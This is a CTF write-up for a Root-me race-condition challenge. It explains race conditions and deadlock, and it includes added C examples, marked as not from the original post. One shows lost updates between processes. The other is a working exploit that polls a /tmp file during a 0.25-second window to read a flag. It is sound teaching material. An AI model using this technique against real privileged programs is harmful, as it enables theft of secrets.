ELF x86 — Race Condition Rootme (App-system)
This challenge is based on the concept of a race condition. Race conditions are interesting for two reasons: they are fairly easy to understand, and they can be critical vulnerabilities :).
Before jumping into the challenge, I want to introduce the concept of a race condition and some important terms related to it.
You won't need all of these concepts for this particular challenge, but you may need them in future CTFs.
If you already know the basics, skip straight to the challenge.
From here on I'll be quoting a number of textbook definitions.
First, what is a race condition?
A race condition occurs when multiple processes access and manipulate the same data concurrently, and the outcome of the execution depends on the particular order in which the accesses take place.
Let me explain this with a diagram.
Take this simple example. Initially Z = 10, and two processes, A and B, run at the same time. Each performs a read-modify-write on Z: A increments it through a local copy X, B decrements it through a local copy Y. Because they run concurrently, the order in which their instructions interleave is not fixed. Here is one possible interleaving:
1. Process A copies Z into X, so X = 10.
2. Process A executes X++, so X = 11.
3. Process A hits a sleep. While a process sleeps, the scheduler runs another ready process, here process B.
4. Process B copies Z (still 10) into Y, so Y = 10.
5. Process B executes Y--, so Y = 9.
6. Process B hits a sleep, so the scheduler switches back to A.
7. Process A writes X back: Z = 11. Process A is done, so B resumes.
8. Process B writes Y back: Z = 9.
The final value of Z is 9. Can you see the problem?
Process A's update (Z = 11) is lost: process B overwrote it with a value computed from the stale copy of Z it read before A wrote back. This lost update is the typical race condition. Now imagine a privileged program with this problem. We can exploit it simply by running a parallel process that acts inside the window where the program's view of the data is stale.
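The lost update above, as an added example in C (not part of the original post): two child processes share one counter through an anonymous shared mapping and each increments it many times with a plain read-modify-write, the same three steps as "X = Z; X++; Z = X". Without synchronization some increments are lost and the final count falls short of 2N; the same loop using an atomic fetch-and-add always reaches 2N. The shared counter, the two-process layout and the iteration count are constructed for the demo.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run two child processes that each increment a shared counter `iterations`
 * times. With use_atomic == 0 the increment is a plain read-modify-write
 * (the "X = Z; X++; Z = X" of the text) and updates can be lost. With
 * use_atomic == 1 the increment is a single atomic operation. */
static long run_counter(long iterations, int use_atomic) {
    /* Anonymous shared mapping: both children see the same counter
       (constructed shared variable, playing the role of Z in the text). */
    volatile long *counter = mmap(NULL, sizeof(long), PROT_READ | PROT_WRITE,
                                  MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (counter == MAP_FAILED) return -1;
    *counter = 0;

    for (int p = 0; p < 2; p++) {
        pid_t pid = fork();
        if (pid < 0) { munmap((void *)counter, sizeof(long)); return -1; }
        if (pid == 0) {
            for (long i = 0; i < iterations; i++) {
                if (use_atomic) {
                    __atomic_fetch_add((long *)counter, 1, __ATOMIC_SEQ_CST);
                } else {
                    long tmp = *counter;   /* read        (X = Z) */
                    tmp = tmp + 1;         /* modify      (X++)   */
                    *counter = tmp;        /* write back  (Z = X) */
                }
            }
            _exit(0);
        }
    }
    for (int p = 0; p < 2; p++) wait(NULL);

    long result = *counter;
    munmap((void *)counter, sizeof(long));
    return result;
}

/* Unsynchronized version: result is at most 2 * iterations, usually less. */
long racy_count(long iterations) { return run_counter(iterations, 0); }

/* Atomic version: result is always exactly 2 * iterations. */
long safe_count(long iterations) { return run_counter(iterations, 1); }

int main(void) {
    long n = 1000000;
    printf("expected %ld, racy %ld, atomic %ld\n",
           2 * n, racy_count(n), safe_count(n));
    return 0;
}
```

The racy result varies from run to run, which is exactly what makes these bugs hard to reproduce and easy to miss in testing: the interleaving that loses updates depends on the scheduler and the number of cores, not on the code alone.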
Next, what are deadlock and concurrency?
We just saw an example of concurrency.
Concurrency is the execution of multiple instruction sequences at the same time.
Deadlock is a situation where a set of processes is blocked because each process is holding a resource and waiting for another resource held by some other process in the set.
Two easy concepts to understand. Now back to the challenge.
Challenge
Let us see the source code
Let us analyze the code. The program writes the flag to a file it creates at /tmp/tmp_file.txt, and it does not let us run it under a debugger. I tried executing the program and then looking in /tmp, but it was too late: the program unlinks the file after 0.25 seconds. So we use the concept discussed above.
We exploit the sleep. While process A (the challenge binary) sleeps, we have a 0.25-second window in which to cat the file before control returns to it and the file is unlinked. So we write our exploit.
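Here is an added example, in C, of the race the challenge describes; the challenge's own source and exploit are not reproduced on this page. The vulnerable_program function is a hypothetical stand-in for the binary's behaviour as described above: write the flag to a file, sleep 0.25 seconds, unlink it. The parent process plays the attacker and polls open() until the file appears. The file path and the flag string are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed flag value for the demo, not the challenge's flag. */
static const char *DEMO_FLAG = "FLAG{constructed_demo_flag}";

/* Hypothetical stand-in for the challenge binary: create the file, write the
 * flag, sleep 0.25 s, unlink. Runs in a forked child and never returns. */
static void vulnerable_program(const char *path, const char *flag) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) _exit(1);
    if (write(fd, flag, strlen(flag)) < 0) _exit(1);
    close(fd);
    usleep(250000);          /* the 0.25 s race window */
    unlink(path);
    _exit(0);
}

/* Attacker side: retry open() until the file exists and has content.
 * Returns bytes read into buf (NUL-terminated) or -1 if the window was missed. */
static ssize_t poll_and_read(const char *path, char *buf, size_t size, int max_tries) {
    for (int i = 0; i < max_tries; i++) {
        int fd = open(path, O_RDONLY);
        if (fd >= 0) {
            /* Once we hold a descriptor, the victim's unlink() cannot take the
               data away: the inode lives until the last descriptor is closed. */
            ssize_t n = read(fd, buf, size - 1);
            close(fd);
            if (n < 0) return -1;
            if (n > 0) {
                buf[n] = '\0';
                return n;
            }
            /* n == 0: file created but not yet written; keep polling. */
        } else if (errno != ENOENT) {
            return -1;
        }
        usleep(1000);        /* 1 ms between attempts, far finer than the window */
    }
    return -1;
}

/* Fork the victim, race it from the parent. Returns 1 if the flag was recovered. */
int race_for_flag(const char *path, const char *flag, char *out, size_t outsize) {
    pid_t pid = fork();
    if (pid < 0) return 0;
    if (pid == 0) vulnerable_program(path, flag);
    ssize_t n = poll_and_read(path, out, outsize, 3000);   /* ~3 s budget */
    waitpid(pid, NULL, 0);
    return n > 0 && strcmp(out, flag) == 0;
}

/* Convenience wrapper with an internal buffer and the demo flag. */
int race_demo(const char *path) {
    char buf[128];
    return race_for_flag(path, DEMO_FLAG, buf, sizeof buf);
}

int main(void) {
    char buf[128];
    const char *path = "/tmp/race_demo_file.txt";   /* constructed path */
    if (race_for_flag(path, DEMO_FLAG, buf, sizeof buf))
        printf("won the race: %s\n", buf);
    else
        printf("lost the race\n");
    return 0;
}
```

Two details matter in practice. A file that exists but is still empty (created but not yet written) must not end the loop, so the reader keeps polling on a zero-byte read. And once open() has succeeded, the victim's unlink() does not destroy the data, because the inode stays alive until the last descriptor is closed, so a read that completes after the unlink still returns the flag. A shell loop that keeps running cat on the path does the same job; that is what "cat the file before control returns" amounts to.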
The exploit itself is very simple, but the concept is the important part. I hope you now understand race conditions.
Do leave some claps, and feel free to ask questions below in the comments. It might help someone else too!
Goodbye :)